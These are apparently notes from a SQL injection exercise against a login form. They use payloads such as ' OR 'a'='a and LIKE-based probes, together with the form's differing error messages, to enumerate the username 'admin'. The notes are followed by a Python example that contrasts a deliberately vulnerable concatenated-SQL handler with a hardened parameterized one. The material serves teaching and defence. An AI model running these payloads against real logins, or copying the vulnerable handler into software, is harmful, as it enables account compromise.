username: foo
password: bar
=> invalid username

username: '
password: bar
=> something went wrong

username: ' OR 'a'='a
password: bar
=> invalid password
: vulnerability regarding too much information on authentication failure
: username is injectable

username: ' OR 'a'='a
password: ' OR 'a'='a
=> invalid password
: password field doesn't seem to be injectable
: focusing on field username
: target: identify username

username: ' OR username LIKE 'a%';
=> invalid password
: username starts with letter 'a'

username: ' OR username LIKE 'aa%'
=> invalid username

username: ' OR username LIKE 'ab%'
=> invalid username

username: ' OR username LIKE 'ac%'
=> invalid username

username: ' OR username LIKE 'ad%'
=> invalid password !
: username starts with 'ad'. Let's try admin?

username: admin
=> invalid password
: we've found the username!
: now, same technique to identify password

username: ' OR password LIKE 'a%
=> invalid username
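
The two weaknesses noted above (distinct failure messages and an injectable username field) next to their fix, as an added example that is not code from the original notes. `vulnerable_login` is an assumed reconstruction of a handler that would give the three observed replies; `hardened_login` binds the username as a parameter and returns one message for every failure. The table layout, function names and sample account are constructed.

```python
import hashlib, hmac, os, sqlite3

GENERIC = "invalid credentials"  # single reply for every failure mode
DUMMY_SALT = b"\x00" * 16        # used when the username does not exist

def hash_pw(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    # Constructed sample data: one account with a salted PBKDF2 hash.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, pw BLOB)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                 ("admin", salt, hash_pw("s3cret-sample", salt)))
    return conn

def vulnerable_login(conn, username, password):
    # Assumed shape of the flawed handler: concatenated SQL, three distinct replies.
    sql = "SELECT salt, pw FROM users WHERE username = '" + username + "'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "something went wrong"
    if row is None:
        return "invalid username"
    if not hmac.compare_digest(hash_pw(password, row[0]), row[1]):
        return "invalid password"
    return "ok"

def hardened_login(conn, username, password):
    # Bound parameter: the input is compared as data and never parsed as SQL.
    try:
        row = conn.execute("SELECT salt, pw FROM users WHERE username = ?", (username,)).fetchone()
    except sqlite3.Error:
        return GENERIC
    salt, stored = row if row else (DUMMY_SALT, b"")
    # Hash even for unknown users so response time does not replace the message oracle.
    matches = hmac.compare_digest(hash_pw(password, salt), stored)
    return "ok" if row is not None and matches else GENERIC

if __name__ == "__main__":
    db = make_db()
    for u in ["foo", "'", "' OR 'a'='a", "' OR username LIKE 'ad%", "admin"]:
        print(repr(u), "|", vulnerable_login(db, u, "bar"), "|", hardened_login(db, u, "bar"))
```

With the hardened handler every input from the notes gets the same reply, so neither the error path nor the username/password distinction tells the client anything about the table contents.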